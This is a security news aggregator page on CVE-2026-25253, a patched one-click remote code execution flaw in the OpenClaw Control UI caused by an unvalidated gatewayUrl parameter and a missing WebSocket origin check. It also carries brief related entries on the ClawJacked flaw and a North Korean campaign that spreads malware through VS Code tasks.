OpenClaw Control UI crafted-link RCE (CVE-2026-25253)
Vulnerability
Summary
Hide ▲
Show ▼
OpenClaw CVE-2026-25253 is a high-severity 1-click RCE flaw that can expose gateway tokens and enable full gateway compromise on impacted instances. The weakness sits in the Control UI, which trusts `gatewayUrl` from the query string without validation and fails to check the WebSocket origin. A crafted malicious link or malicious page can trigger token theft and privileged gateway access. The issue was fixed in version 2026.1.29.
Related Happenings
OpenClaw ClawJacked localhost WebSocket brute-force security flaw
Vulnerability
First: 01.03.2026 23:44
Last: 01.03.2026 23:44
Sources 1
About this happening:
**OpenClaw**’s **ClawJacked** vulnerability allowed a **malicious website** to brute-force a **localhost WebSocket** connection and take control of a local instance, putting **ses...
OpenClaw ClawJacked localhost WebSocket brute-force security flaw
VulnerabilityAbout this happening: **OpenClaw**’s **ClawJacked** vulnerability allowed a **malicious website** to brute-force a **localhost WebSocket** connection and take control of a local instance, putting **ses...
BeaverTail and InvisibleFerret backdoor delivery via malicious VS Code task abuse
Malware Activity
First: 20.01.2026 20:41
Last: 20.01.2026 20:41
Sources 1
About this happening:
**North Korean** threat actors tied to **Contagious Interview** are using **malicious Visual Studio Code (VS Code) tasks** and injected code in **compromised developer repositorie...
BeaverTail and InvisibleFerret backdoor delivery via malicious VS Code task abuse
Malware ActivityAbout this happening: **North Korean** threat actors tied to **Contagious Interview** are using **malicious Visual Studio Code (VS Code) tasks** and injected code in **compromised developer repositorie...
Latest development: 22.04.2026 17:48
North Korean actor Void Dokkaebi, aka Famous Chollima, is turning the Contagious Interview fake-job lure into a self-propagating software supply-chain infection that abuses compromised developer repositories, malicious VS Code tasks, and injected code to spread malware and steal credentials. The campaign targets developers seeking work, can hide a poisoned .vscode folder in committed code, and Trend Micro said it found more than 750 infected code repositories, more than 500 malicious VS Code task configurations, and 101 commit-tampering instances in March.
Timeline
-
02.02.2026 18:28 1 articles · 3mo ago
OpenClaw releases fix for CVE-2026-25253
Mitigation Patch UpdateOpenClaw released version 2026.1.29 on January 30, 2026 to address CVE-2026-25253, a high-severity flaw tied to crafted malicious links, token exfiltration, full gateway compromise, and 1-click RCE against the Control UI and gateway API.
Show sources
- OpenClaw Bug Enables One-Click Remote Code Execution via Malicious Link — thehackernews.com — 02.02.2026 18:28
-
02.02.2026 18:28 2 articles · 3mo ago
OpenClaw discloses Control UI one-click RCE
Initial DisclosureOpenClaw publicly disclosed CVE-2026-25253 on February 2, 2026, describing a Control UI flaw where `gatewayUrl` from the query string is trusted without validation and the WebSocket origin is not checked, allowing a crafted malicious link or malicious web page to steal the stored gateway token, bypass authentication, and reach operator-level access and code execution on the gateway host.
Show sources
- OpenClaw Bug Enables One-Click Remote Code Execution via Malicious Link — thehackernews.com — 02.02.2026 18:28
- OpenClaw Bug Enables One-Click Remote Code Execution via Malicious Link — thehackernews.com — 02.02.2026 18:28